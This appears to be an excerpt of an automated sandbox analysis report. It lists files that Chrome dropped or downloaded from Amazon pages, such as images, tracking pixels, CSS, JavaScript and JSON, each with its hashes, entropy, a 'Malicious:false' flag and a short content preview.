                                                                                                                                                                                                                                                                Preview:......JFIF................................................................"!!!"&&&&&&&&&&........... ... &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......................4.........................................................................H....: + ...............O.....?l<.NdW.....<v.|w=..............R..w.Z.uK.>......U...I.t.l..<................GN2...W.]. ...0.N...;Y.w.7}|..........%..p...uo. ......."R................S...z.?^.z$.........u...D.5........,.y...............F..M...QP......9..... ..........6..uZ.y.......!...<..~=.................5.su.d.......eoj.................[....0.....yl... .............D...N.=f.....j...PH......Z..O.d........z.LY.t*...[............9r.k..{.l.$|}........u.a..=p..._3f2..@...."<.G+.3.h.=qIls......."N...O...!....c..R.....[1.w.=.?`!...w..s)...#.....`.(..c.7=<. .!.f..U......./.S.._.hi.H.,R.c^.....<C..A...qSB..$.g..X...=.x.JH.....B.G..`..~.A.`!I.s.....U..K.Gw.....Z...+.....z}.OZ..u .;M......Zz..v.P.....Zx.,y.;...).+.?.....;._.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7638
                                                                                                                                                                                                                                                                Entropy (8bit):7.894141029119417
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TApPGYqQwCfrE7QwiUsL5oG7HMQXFcVmESTL0Hiv9WdhITTv7Qh2PbkTH7QfEeCM:EoYnzE7QwbdoHrF5hTUiv9WkTwQMHfxY
                                                                                                                                                                                                                                                                MD5:8685B97B3710F3462A9FEA1E4EBEFB8F
                                                                                                                                                                                                                                                                SHA1:5D419D445E320F04C48E4AC31775CE30FD77C7F1
                                                                                                                                                                                                                                                                SHA-256:642C5DA6BEFFDE57ECEC1919FD2C805B2A09797CFA3CCCD01E5891534F3B4522
                                                                                                                                                                                                                                                                SHA-512:824E400478606117BFE8794FE2DBC28A66CD8F91F19FFCECE38755107F97DBA936220F42E98A104F4A2CA6D164EA19189C4F448ACE0A5C0E5335C60B011C7315
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.........................................................................T.rl..w.VA.".......(Z..]..lt.....\9...0i.>..,.<G...v........)s.../Uk...P..'....D.[(;.$M.......D....g..R.U...<I.D.i. w.'J.....v.*#.U&....e.).....c .+..}d.#l.fA.`..w...z....=u..W....i.N.]..Z..,.E.R.N_.....Il...Y:)........ ....}.aAcTN...M.[.Rq.XU.....A8...a7t,.......-.....n.&.....)3...;/..\....V...^.....U...@....E...._I...z....Z.e..6..+...G..b.V..V$n.....C....k....Uo..x..~.L...&.|.).].....<.&.......8......y....c....k........S\.:...W.....z.}~.U.z....Y...#Ia..v...9.\jT.rm./yE.....r.}........=.............:}./.Zu.[......N.gc...uw.y?]f..wt..*..6......g{.>....E....5....c..A.Xn......+.........................!01A. ".2BQ@Ra#3.............h.S.I>..T.n.....t.....%.....K....c...8..[&].n7....^.yxo..'...."..G....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5203
                                                                                                                                                                                                                                                                Entropy (8bit):7.836188463655531
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:xyp717Sw2bfkfioZ8v6pYC/gvnDKRWsGilV36SaQej62arQiGibKp5Lo:xyff2CeC/gvnDKRrnZMarQsbK7M
                                                                                                                                                                                                                                                                MD5:E17A9C392B377C4FD7B7F1DEEB758782
                                                                                                                                                                                                                                                                SHA1:DF4DD289DDA661B7124F97416101DC916EE16356
                                                                                                                                                                                                                                                                SHA-256:9FAC05FCF7ED3F20826F4514200E2B15082560D018D596C80A49A7CD19A4EC7F
                                                                                                                                                                                                                                                                SHA-512:6EEF9C7F661A9EAE1583CC95F7231722E215A2EE35A981972E0E53E29D226C5221EE1FE2DCFD82EFFC4BF92F6516C3CB200A46007E23908B4AF7D0DD136D7BF5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................n.......==@.....<19....+i......7....nl..#~^...n;....kp..z........tt|.e*p....Y..v.........;.G_..y.|...D.......9q.%.H..Mo.-.o......e...,..06.P..o...m...^D.......c.4..E...>...b|y..y...9.UOm.x.FJ.....[.\m9\mV....b...*....>..f..._I..+.E...aZ..{.9=N.....if......l.a+=>.!..._.....".\..a.&../J.z:.<...................Z.............................1..!%5AU..$&04EQaq..F....6Wef...."'DGPRTv.....27@dtu...............?....u.\.e........q......e..I...../.K@.1..6m...X.S...$.. .)........\..m.?.g..rOj.T...wmFUY....'..OiS...Wr.t-....wrT._....]....i.W..w.6K.@Q..L.:c[h.)s..Z..Z9....4..lQp_bL...,@.wUC.H8......r.. .M%..?..,._.:(.d..3...Fq......K ....C.54&..!.....=@....T../L/".I3K.k..!C.k*.M.....{_.....]..Hr.g[..... 5.eh.]..f.....y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469073783&rand=382473
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3419)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3727
                                                                                                                                                                                                                                                                Entropy (8bit):4.799019202515734
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YfNHMdNpNc6zu9CqbDKWmIl6dO/5C/FVqjweIdhPLZ1:yKo6zus9W8WCvZeML3
                                                                                                                                                                                                                                                                MD5:A5F0396591D56626C9C483D1643BAC11
                                                                                                                                                                                                                                                                SHA1:4803930B3EF9AEFDEFB00BA97DFF2235F905AF03
                                                                                                                                                                                                                                                                SHA-256:4B74E18F9FDEADD5BBC52F28B71FD36029F5674F0800C6449F0AEF8C1A953C72
                                                                                                                                                                                                                                                                SHA-512:BFA0E577FAB6E280B62D870E55B9493814DA9CB8432F0D1BC8124DED10FC5CA1AE0236FF162E4BB81F5C99F64274476C20F54DF5868FD038EC981FA4BCD6224A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01jGK8CGXTL._RC%7C11mqgJVSK9L.css_.css?AUIClients/ALMCartActionAssets
                                                                                                                                                                                                                                                                Preview:#lts-ingress-container{left:0;right:0;bottom:0;padding:4px;display:none;position:fixed;z-index:99;transition-property:bottom,height,min-height,margin-bottom;transition-duration:.5s}#lts-ingress-container-offset{transition-property:height,margin-bottom;transition-duration:.5s}./* ******** */..a-button.a-button-primary.primary-fresh-btn-flat,.a-button.primary-fresh-btn-flat{background:#b5d25e}.a-button.a-button-primary.primary-fresh-btn-flat.a-button-focus,.a-button.a-button-primary.primary-fresh-btn-flat:focus,.a-button.primary-fresh-btn-flat.a-button-focus,.a-button.primary-fresh-btn-flat:focus{box-shadow:0 0 3px 2px rgba(111,160,13,.5)}.a-button.a-button-primary.primary-fresh-btn-flat.a-button-focus:after,.a-button.a-button-primary.primary-fresh-btn-flat.a-button-primary:after,.a-button.a-button-primary.primary-fresh-btn-flat.a-button-primary:focus,.a-button.a-button-primary.primary-fresh-btn-flat:after,.a-button.primary-fresh-btn-flat.a-button-focus:after,.a-button.primary-fresh-btn-
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 126x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9203
                                                                                                                                                                                                                                                                Entropy (8bit):7.954863681191278
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:glHFrpt5KUfkxctYHZBMpH9Wda2P7KiVOyJ+:sPt5KUfTi66fDrVOG+
                                                                                                                                                                                                                                                                MD5:68EB8595D081CF4B7EA0D63ED08EED84
                                                                                                                                                                                                                                                                SHA1:F47590FC6293EC2EF5B7460545DF64112E76EAFD
                                                                                                                                                                                                                                                                SHA-256:4134D9EA47F8E53290973E4EEBA321B46EBD627E174D6FCB266D97F7C006D708
                                                                                                                                                                                                                                                                SHA-512:83F1B9B1C9FBE4D8BAC64037C0D2A30A661D8FC90E2200BD9626C41C1EDFEA35CBD470308B6D2EA29882F79AA3FE9C1BD037558887448CD5BB10F9692C6BBF07
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!..1"A..Q#2Raq..Bb..3r..$Cc..5.s.................................................!.1..A"2Qa...q.........B............?..z4h.....:...z..V.f*....>..5....nS.W...UP=m.N(].#......P..=6...K...].........]..M.P.C.b0g~.*W_W.<...}7...&....O...L..OF..<UqU..=.6......Fy......q.<[......f..QF..4..1..*Y.....`.h.....=.d..0....d..8b..l...B.V.....s.Z...9.Vcp...3,;....0...%O...-..Y.........}..+IJ?PP"0_s.}F..4....3.{Q4...F.E._.".pn....,.{E..8.@.2!.uW.........F...m.!..w}..0.3.V..q....W.^9.......vtu........7.#x.J..M.o.C9Q..*Q.<.......nQ.i...nR".O!......o......B.N.v.....S....o....8[H.?...U..N.r..Y.........n....Q.....M.4..zO.=mI4.OZ..... .M... _-s...7..&.j..H....n...$!..rB./.....:.i..t.y.<.;.M....p;..vh.0Yn.\N......0\...._r...>...#..O......&hh..[...L.8/.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26ctb%3D1%26sc0%3Dp13n-rvi_desktop-rvi_0%26bb0%3D2042%26be0%3D2042%26pc0%3D3006%26ld0%3D3006%26t0%3D1723469066942%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:3007
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):29858
                                                                                                                                                                                                                                                                Entropy (8bit):5.405661940909039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:gd3+dHJ67FPpE3eFNxQoRvL4aX+wgvDv5IPg4empqsRU+/jfrY6bV6akWvBiq/YB:gJOpGPpEuKoZLbP2grqaP3bVWKb3C
                                                                                                                                                                                                                                                                MD5:0CB76A637EFA2BC041EA0D77BF42EF8F
                                                                                                                                                                                                                                                                SHA1:BDDC79ABFDA3FD2C79A989DCE316DC86D1BBCD1D
                                                                                                                                                                                                                                                                SHA-256:23C7F1CE5DDB37E4222C10A4DF0824A43272CC1498292149FE7258E6FB3AEA85
                                                                                                                                                                                                                                                                SHA-512:E535703ACA0A107278B29FADF24713515B73E61F606F1451772535DEC2DA24725CFB47391CCEEFF1CC77AF74D20BE7B220B59A5CCAA0138CC0B33550D655C1DA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-n3Mvj content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-C2DYAMVW9JC30YYDJS26 pd_rd_wg-v1whY pd_rd_r-50879cd8-33e1-40ca-8d77-e9cad86dd5ad c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstance5xs1QGXU9gPPmjJOsoAepQ\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 58x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2613
                                                                                                                                                                                                                                                                Entropy (8bit):7.825556176758994
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r/lnI27UC9mumYFxYL+bJq1FX22U1aaz6LhM+g5rbNhzJAb5jQEP1BcOcU0Lp:Tli40z6LhM+gHFJDEPb1cUyH
                                                                                                                                                                                                                                                                MD5:5122C4972FE4B07FD15BA3916AAEDC70
                                                                                                                                                                                                                                                                SHA1:44E5908D4F4010EE9C458B302B150839A99854C0
                                                                                                                                                                                                                                                                SHA-256:30DCF579462FD5A35E6956FF01319023C38E548AD88EAE68FF5EE6F23BA95D7B
                                                                                                                                                                                                                                                                SHA-512:C9BF02FAD625432B979789FCE94B1B1CAA33F116CB3125586816B5A2CF32C3ED17F487E0FFDC31671AA341853C73C198860397F06F00828F87EA8890975C128B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........:..".................................................................!AQ.."14qs.23Bdrt...#Ra....$5CD..%......................................................?..(.>...t].o'.:..(..&s..T....A_..}.......O..n.G._c...G..`...sn5.I.a...5x.....b.V...`........d.....>..*_R.m..X..........q.V4.#...!H\..NC.:..].k..3Z.p....8O.:....,..^.....j4...4...........Y.+.>mOl.....E^..........VF.E-..=HV,...2(-.QE.J.....Uo.uKo.t...le.E[..e...e.......U.<.......Kw$....(.|z8..mX4.B-J........W...5X....{.....l{fz.....%3..L..Z... ..H.(....RT..".......\...c'.>...Mm.&4.e{..:PY..i.ht..e..fI{.d..iHlvf.t.....]..?...E.W.Mm0.dee.W.M.P)w_...q{.....6w.n.as.q.Kq....A..7].S...r.P...gX.N...O...d...O.Y.uaV](&..X.8..,@<\..$.=.'..[e...'.x...vc....+...3.k.v...5..,....X.....r..^v........tG.W....m...t..._}.....@QE..W4$X..=..U..*..@Q..p.c....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1933
                                                                                                                                                                                                                                                                Entropy (8bit):7.206803405960611
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rhhKeAY5AzP6qNpdhUeoBk1tjl41zLGCjF:TeL5OP6wLboBktj21ljF
                                                                                                                                                                                                                                                                MD5:F145D0A5A46CDE00B2E8D004E4746156
                                                                                                                                                                                                                                                                SHA1:8813828E1EC121491E5914898AE3F48F57B8AC73
                                                                                                                                                                                                                                                                SHA-256:4D60B213703FB63DD25C81AA4CD59BE5F3ED666F4A44066CA7AC05D5FD1421FB
                                                                                                                                                                                                                                                                SHA-512:A4037153D62E85D66054ABC0568451863ECCA6B84CB7E1F088883473A1632CFDD39A2F682F7FF86064EB3E6FEF1E2C769A7EE81797C1C21BB6D8CB0DC5D76FDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/41Egkilho1L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1.A..2QRa..."#Bb..4..3q.............................................1.!a..2Qq.Ar....4bc..............?.......[.3jk...P.4..E....i..(O..o..6Zf.[..u.[p.\..g..D.%....~...>..r..d6..6...yr.5.\.l....q.I.x.............................h7>...Xs..]..k.K.DGg.l.L..5..UK.o}...u......#[.hS.1.y..).T.J.]WR....Wv..Vk.e...'...%..en.ef../.?.~5._.....O.E.cXg|6.i...*.......................... ..g=j5e......M.q.,..}..r.(......{u...Y/+../....!....t|.2..Y...+...$.3..zO.V.#.CwS....^..?V...T...2BZ-....c.-5....@.............................yZ^W.........9...D.lnlM....g......K..Rn.'+h.K^. .L....]..8|.I...6t.c=c..{W.I.}..<......S..?^.WG.;....4z..&'I............................T.Mr..Sz.%..'..A.M..F:.%...03h...y.+.).k.i._D/..*Q.i..M>.2....k......>..$...3.O.t..?.?.....P*
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):48888
                                                                                                                                                                                                                                                                Entropy (8bit):5.316989310603465
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                                                                                MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                                                                                SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                                                                                SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                                                                                SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D5709%26at%3D5709%26t%3D1723469093786%26csmtags%3DendVL%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5708
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5643
                                                                                                                                                                                                                                                                Entropy (8bit):7.864358643933752
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                                                                                MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                                                                                SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                                                                                SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                                                                                SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                                                                                Malicious:false
